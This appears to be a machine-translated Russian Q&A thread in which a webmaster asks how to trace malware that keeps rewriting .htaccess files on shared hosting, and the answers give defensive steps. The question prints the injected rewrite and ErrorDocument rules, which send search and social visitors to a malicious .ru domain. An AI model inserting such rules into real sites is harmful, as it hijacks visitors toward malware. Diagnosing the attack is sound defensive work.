Общий хостинг с вредоносным ПО, файл.htaccess изменяется каждые 2 часа или около того

Question

Общий хостинг с вредоносным ПО, файл.htaccess изменяется каждые 2 часа или около того

Я провел весь день, гоняясь за вредоносным ПО на виртуальном хостинге для одного из моих клиентов.

Проблема заключается в следующем: каждые 2 часа или около того.htaccess файл и все другие.htaccess файлы изменяются, в верхней части файла добавляются следующие строки:

IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L]
</IfModule>

и внизу:

ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8

Основная проблема - я не root на сервере и не могу sudo, так как это общий хостинг с сотнями сайтов. Типичные хорошие команды, такие как dmesg, lsof, dtrace, chattr и многие другие, мне недоступны, так как я не root.

Я не могу найти, кто изменяет файлы.htaccess, как мне получить эту информацию? Я предполагаю, что какой-то скрипт php меняет то, что вызывается извне через команду и управление.

Похоже, это относится к этому: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/

Как мне узнать, кто изменяет файлы.htaccess, не будучи пользователем root?

1

apache-2.2

Источник

apache 07 июн '12 в 22:36

2 ответа

Другие вопросы по тегам apache-2.2

thinice 07 июн '12 в 22:45 2012-06-07 22:45 · Answer 1 · 2012-06-07 22:45

Без рута или доступа к диагностическим инструментам вы бы били головой об стену. Вы можете просматривать файлы в поисках этого .ru чтобы увидеть, если это что-то под вашим контролем.

Есть инструменты, которые вы могли бы сделать в темноте и попробовать: inotify, lsof (маловероятно) - или просто подавление .htaccess файл не будет доступен для записи Apache (если это возможно). Если это каждые два часа, посмотрите на crontab также.

В конце концов, что-то все еще не работает, и вам, вероятно, следует обратиться к следующему: Как мне работать с взломанным сервером?

Oliver 08 июн '12 в 06:47 2012-06-08 06:47 · Answer 2 · 2012-06-08 06:47

Прежде всего, вам также следует обратиться за помощью к вашему хостинг-провайдеру, который хотел бы знать, что одна из веб-сайтов, которую он размещает, была взломана. Возможно, что весь сервер скомпрометирован. В этом случае ваш провайдер будет нести ответственность за перенос вашего сайта на другой защищенный сервер, чтобы они могли анализировать, очищать и переустанавливать.

В любом случае вам следует попросить их соотнести дату / время измененного файла.htaccess с любыми имеющимися журналами: access.log, auth.log, журнал FTP-сервера и т. Д.

Кроме того, может быть полезно сравнить файлы в вашей сети с последней резервной копией, чтобы вы могли увидеть, что еще было изменено.